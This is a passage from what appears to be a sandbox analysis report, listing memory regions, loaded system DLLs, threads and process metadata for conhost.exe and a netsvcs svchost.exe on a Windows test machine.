entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 2461 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2462 start_va = 0x7ff857680000 end_va = 0x7ff8576a1fff monitored = 0 entry_point = 0x7ff857681a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2463 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2464 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2465 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2466 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2467 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 2468 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2469 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2470 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2471 start_va = 0x790000 end_va = 0x790fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2472 start_va = 0x7b0000 end_va = 0x7b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 2473 start_va = 0x7ff851850000 end_va = 0x7ff851ac3fff monitored = 0 entry_point = 0x7ff8518c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2474 start_va = 0x7c0000 end_va = 0x7c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2475 start_va = 0x1ee0000 end_va = 0x1ee1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Thread: id = 73 os_tid = 0x31c Thread: id = 74 os_tid = 0x960 Thread: id = 77 os_tid = 0x32c Thread: id = 80 os_tid = 0xd30 Thread: id = 86 os_tid = 0xc90 Process: id = "21" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x21e40000" os_pid = "0x9bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x6f4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2358 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2359 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2360 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2361 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2362 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2363 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2364 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2365 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2366 start_va = 0x7ff6965e0000 end_va = 0x7ff6965f0fff monitored = 0 entry_point = 0x7ff6965e16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2367 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2368 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2369 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2370 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2371 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2372 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2373 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2374 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2375 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2376 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2377 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2378 start_va = 0x7ff84f7a0000 end_va = 0x7ff84f7f8fff monitored = 0 entry_point = 0x7ff84f7afbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2379 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2380 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2381 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2382 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2383 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2384 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2385 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2386 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2387 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2388 start_va = 0x7ff85d090000 end_va = 0x7ff85d0cafff monitored = 0 entry_point = 0x7ff85d0912f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2389 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2390 start_va = 0x7ff857c10000 end_va = 0x7ff857d95fff monitored = 0 entry_point = 0x7ff857c5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2399 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2400 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2401 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2402 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 2403 start_va = 0xb60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 2404 start_va = 0x1f60000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 2413 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2414 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 2415 start_va = 0x7ff85a5a0000 end_va = 0x7ff85bafefff monitored = 0 entry_point = 0x7ff85a7011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2416 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2417 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2418 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2419 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2420 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2421 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2422 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2423 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2424 start_va = 0x7ff858070000 end_va = 0x7ff858105fff monitored = 0 entry_point = 0x7ff858095570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2425 start_va = 0x640000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2431 start_va = 0x20c0000 end_va = 0x23f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2432 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2433 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2434 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 2435 start_va = 0x640000 end_va = 0x699fff monitored = 1 entry_point = 0x6553f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2436 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 2437 start_va = 0x2400000 end_va = 0x2614fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2440 start_va = 0x2620000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2441 start_va = 0x1f60000 end_va = 0x206afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 2442 start_va = 0x20b0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 2443 start_va = 0x2840000 end_va = 0x2a53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 2444 start_va = 0x2a60000 end_va = 0x2b6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 3246 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Thread: id = 75 os_tid = 0x9a4 Thread: id = 76 os_tid = 0xd68 Thread: id = 78 os_tid = 0x384 Thread: id = 87 os_tid = 0xc9c Process: id = "22" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5677a000" os_pid = "0x364" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b276" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2553 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2554 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2555 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2556 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2557 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2558 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2559 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2560 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2561 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2562 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 2563 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2564 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 2565 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2566 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 2567 start_va = 0x170000 end_va = 0x176fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2568 start_va = 0x180000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2569 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2570 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2571 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2572 start_va = 0x5c0000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2573 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 2574 start_va = 0x690000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2575 start_va = 0x6a0000 end_va = 0x6a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 2576 start_va = 0x6b0000 end_va = 0x6b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2577 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2578 start_va = 0x6d0000 end_va = 0x6d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 2579 start_va = 0x6e0000 end_va = 0x6e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 2580 start_va = 0x6f0000 end_va = 0x6f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 2581 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2582 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2583 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 2584 start_va = 0xb20000 end_va = 0xf1afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 2585 start_va = 0xf20000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 2586 start_va = 0xfa0000 end_va = 0xfe4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 2587 start_va = 0xff0000 end_va = 0xff6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 2588 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 2589 start_va = 0x1100000 end_va = 0x110ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 2590 start_va = 0x1110000 end_va = 0x1116fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2591 start_va = 0x1120000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 2592 start_va = 0x11a0000 end_va = 0x11b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 2593 start_va = 0x11c0000 end_va = 0x11c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 2594 start_va = 0x11d0000 end_va = 0x11e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 2595 start_va = 0x11f0000 end_va = 0x11f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 2596 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2597 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2598 start_va = 0x1400000 end_va = 0x1410fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 2599 start_va = 0x1420000 end_va = 0x1430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 2600 start_va = 0x1440000 end_va = 0x1446fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 2601 start_va = 0x1450000 end_va = 0x14cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 2602 start_va = 0x14d0000 end_va = 0x14e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 2603 start_va = 0x14f0000 end_va = 0x14f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014f0000" filename = "" Region: id = 2604 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 2605 start_va = 0x1600000 end_va = 0x1936fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2606 start_va = 0x1940000 end_va = 0x1a3ffff monitored = 1 entry_point = 0x0 